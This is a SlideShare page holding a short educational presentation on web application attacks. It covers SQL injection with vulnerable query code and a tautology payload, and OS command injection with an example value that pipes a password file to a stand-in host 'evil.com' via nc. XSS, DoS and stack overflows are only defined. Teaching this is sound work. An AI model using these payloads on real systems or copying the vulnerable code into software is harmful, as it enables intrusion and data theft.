SlideShare a Scribd company logo

Web application attack Presentation

Download as PPTX, PDF
Khoa Nguyen, profile picture
Khoa Nguyen

The document discusses various types of web application attacks, including SQL injection, cross-site scripting, and Denial-of-Service (DoS) attacks. It provides specific examples of how these attacks can be executed, such as manipulating user input to exploit vulnerabilities. Additionally, it touches on concepts like stack buffer overflows and their implications for web security.

Technology
1 of 8
Downloaded 24 times
1
2
Most read
3
4
5
6
7
8
Web Application Attack Nguyễn Kiều Khoa
- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application. http://en.wikipedia.org/wiki/Web_application What is a web application?
1.Injection (SQL Injection) db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'"); - Suppose the user request parameter is …' or '1'='1 - Then the query we execute is … (note that and has precedence over or) select * from users where name='' or '1'='1'
- Suppose we’re too lazy to perform DNS lookup, so we resort to the following: - Suppose the hostname parameter is … foo || cat /etc/password | nc evil.com - Then we end up sending the password file to evil.com 1.Injection (OS Command) system("nslookup " + Request["hostname"]);
- Injecting JavaScript into pages viewed by other users. 2.Cross-Site Scripting
- denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users http://en.wikipedia.org/wiki/Denial-of-service_attack 3.DoS and DDoS
- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. 4.Stack Overflow
Q&A

More Related Content

PPTX
Web application attacks
hruth
 
PDF
Common Web Application Attacks
Ahmed Sherif
 
PPTX
Web Security Attacks
Sajid Hasan
 
PPTX
Cross site scripting XSS
Ronan Dunne, CEH, SSCP
 
PPTX
Unicode
Ronan Dunne, CEH, SSCP
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
PPTX
Error codes & custom 404s
Ronan Dunne, CEH, SSCP
 
PPTX
Presentation on Web Attacks
Vivek Sinha Anurag
 
Web application attacks
hruth
 
Common Web Application Attacks
Ahmed Sherif
 
Web Security Attacks
Sajid Hasan
 
Cross site scripting XSS
Ronan Dunne, CEH, SSCP
 
Unicode
Ronan Dunne, CEH, SSCP
 
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Error codes & custom 404s
Ronan Dunne, CEH, SSCP
 
Presentation on Web Attacks
Vivek Sinha Anurag
 

What's hot (20)

PPT
Hacking A Web Site And Secure Web Server Techniques Used
Siddharth Bhattacharya
 
PDF
Flashack
n|u - The Open Security Community
 
PPTX
Web Hacking Series Part 4
Aditya Kamat
 
PPTX
Owasp Top 10 A1: Injection
Michael Hendrickx
 
PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
PPTX
Web Hacking Intro
Aditya Kamat
 
PDF
Pentesting RESTful webservices
Mohammed A. Imran
 
PPTX
Security asp.net application
ZAIYAUL HAQUE
 
PPTX
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
PPT
Secure code practices
Hina Rawal
 
PPT
Web Hacking
Information Technology
 
PDF
Owasp top 10 2013
Edouard de Lansalut
 
PDF
Sql Injection and XSS
Mike Crabb
 
PDF
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
PDF
2013 OWASP Top 10
bilcorry
 
PPTX
Web Hacking Series Part 1
Aditya Kamat
 
PPTX
Rapid Android Application Security Testing
Nutan Kumar Panda
 
PPTX
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
PDF
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
PDF
Web Security 101
Michael Peters
 
Hacking A Web Site And Secure Web Server Techniques Used
Siddharth Bhattacharya
 
Flashack
n|u - The Open Security Community
 
Web Hacking Series Part 4
Aditya Kamat
 
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Web Hacking Intro
Aditya Kamat
 
Pentesting RESTful webservices
Mohammed A. Imran
 
Security asp.net application
ZAIYAUL HAQUE
 
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
Secure code practices
Hina Rawal
 
Web Hacking
Information Technology
 
Owasp top 10 2013
Edouard de Lansalut
 
Sql Injection and XSS
Mike Crabb
 
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
2013 OWASP Top 10
bilcorry
 
Web Hacking Series Part 1
Aditya Kamat
 
Rapid Android Application Security Testing
Nutan Kumar Panda
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
Web Security 101
Michael Peters
 
Ad

Viewers also liked (20)

PDF
Behind The Scenes Of Web Attacks
Maurizio Abbà
 
PPTX
Anatomy Web Attack
Kelly Speiser
 
PPTX
Web Application Vulnerabilities
Preetish Panda
 
PPTX
Lesson 6 web based attacks
Frank Victory
 
PPT
Web attacks
husnara mohammad
 
PPT
Web Attacks - Top threats - 2010
Shreeraj Shah
 
PDF
Top Ten Web Attacks
Ajay Ohri
 
PPT
Trends in Web Attacks
IWMW
 
PDF
Real web-attack-scenario
OWASP (Open Web Application Security Project)
 
PDF
QualysGuard InfoDay 2013 - Web Application Firewall
Risk Analysis Consultants, s.r.o.
 
PPTX
Hacking Web: Attacks & Tips
Iván Sanz de Castro
 
PPTX
Pentesting iPhone applications
Satish b
 
ODP
Web Application Firewall
Chandrapal Badshah
 
PPTX
Security-Web Vulnerabilities-Browser Attacks
Raghu Addanki
 
PPT
Why You Need A Web Application Firewall
Port80 Software
 
PPTX
Radware - WAF (Web Application Firewall)
Deivid Toledo
 
PDF
Citrix & Canalys: Northern European Channel Partners in a State of Transforma...
Citrix
 
PPTX
Web Browsers
Aahmed Hussain
 
PPTX
Web application security: Threats & Countermeasures
Aung Thu Rha Hein
 
PPTX
Types of cyber attacks
krishh sivakrishna
 
Behind The Scenes Of Web Attacks
Maurizio Abbà
 
Anatomy Web Attack
Kelly Speiser
 
Web Application Vulnerabilities
Preetish Panda
 
Lesson 6 web based attacks
Frank Victory
 
Web attacks
husnara mohammad
 
Web Attacks - Top threats - 2010
Shreeraj Shah
 
Top Ten Web Attacks
Ajay Ohri
 
Trends in Web Attacks
IWMW
 
Real web-attack-scenario
OWASP (Open Web Application Security Project)
 
QualysGuard InfoDay 2013 - Web Application Firewall
Risk Analysis Consultants, s.r.o.
 
Hacking Web: Attacks & Tips
Iván Sanz de Castro
 
Pentesting iPhone applications
Satish b
 
Web Application Firewall
Chandrapal Badshah
 
Security-Web Vulnerabilities-Browser Attacks
Raghu Addanki
 
Why You Need A Web Application Firewall
Port80 Software
 
Radware - WAF (Web Application Firewall)
Deivid Toledo
 
Citrix & Canalys: Northern European Channel Partners in a State of Transforma...
Citrix
 
Web Browsers
Aahmed Hussain
 
Web application security: Threats & Countermeasures
Aung Thu Rha Hein
 
Types of cyber attacks
krishh sivakrishna
 
Ad

Similar to Web application attack Presentation (20)

PPTX
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
PDF
The top 10 security issues in web applications
Devnology
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
PDF
Drupal Security Seminar
Calibrate
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PPTX
ASP.NET Web Security
SharePointRadi
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
KEY
DVWA BruCON Workshop
testuser1223
 
PDF
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
PPTX
Network And Application Layer Attacks
Arun Modi
 
PDF
4 andrii kudiurov - web application security 101
Ievgenii Katsan
 
PPT
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Chema Alonso
 
PDF
[Poland] It's only about frontend
OWASP EEE
 
PDF
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
PDF
WebView security on iOS (EN)
lpilorz
 
PDF
Web Application Security in Rails
Uri Nativ
 
PPTX
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
PPTX
Understanding and preventing sql injection attacks
Kevin Kline
 
PDF
16 Web Application Penetration Testing 102.pdf
Er Kumar Dhananjay
 
PDF
ruxc0n 2012
mimeframe
 
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
The top 10 security issues in web applications
Devnology
 
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Drupal Security Seminar
Calibrate
 
Php & Web Security - PHPXperts 2009
mirahman
 
ASP.NET Web Security
SharePointRadi
 
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
DVWA BruCON Workshop
testuser1223
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Network And Application Layer Attacks
Arun Modi
 
4 andrii kudiurov - web application security 101
Ievgenii Katsan
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Chema Alonso
 
[Poland] It's only about frontend
OWASP EEE
 
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
WebView security on iOS (EN)
lpilorz
 
Web Application Security in Rails
Uri Nativ
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
Understanding and preventing sql injection attacks
Kevin Kline
 
16 Web Application Penetration Testing 102.pdf
Er Kumar Dhananjay
 
ruxc0n 2012
mimeframe
 

More from Khoa Nguyen (6)

PPTX
Coding convention
Khoa Nguyen
 
PPTX
Network security - Basic concepts
Khoa Nguyen
 
PPTX
Network security (Mã hóa hiện đại)
Khoa Nguyen
 
PPTX
Network fundamental presentation
Khoa Nguyen
 
PPTX
Hibernate Basic Concepts - Presentation
Khoa Nguyen
 
PPTX
Bible app on android
Khoa Nguyen
 
Coding convention
Khoa Nguyen
 
Network security - Basic concepts
Khoa Nguyen
 
Network security (Mã hóa hiện đại)
Khoa Nguyen
 
Network fundamental presentation
Khoa Nguyen
 
Hibernate Basic Concepts - Presentation
Khoa Nguyen
 
Bible app on android
Khoa Nguyen
 

Recently uploaded (20)

PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
Cloud computing and distributed systems.
kkkkkhan
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Teaching material agriculture food technology
LiaRayya
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Encapsulation theory and applications.pdf
gurumoop
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 

Web application attack Presentation

  • 2. - A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application. http://en.wikipedia.org/wiki/Web_application What is a web application?
  • 3. 1.Injection (SQL Injection) db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'"); - Suppose the user request parameter is …' or '1'='1 - Then the query we execute is … (note that and has precedence over or) select * from users where name='' or '1'='1'
  • 4. - Suppose we’re too lazy to perform DNS lookup, so we resort to the following: - Suppose the hostname parameter is … foo || cat /etc/password | nc evil.com - Then we end up sending the password file to evil.com 1.Injection (OS Command) system("nslookup " + Request["hostname"]);
  • 5. - Injecting JavaScript into pages viewed by other users. 2.Cross-Site Scripting
  • 6. - denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users http://en.wikipedia.org/wiki/Denial-of-service_attack 3.DoS and DDoS
  • 7. - A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. 4.Stack Overflow
  • 8. Q&A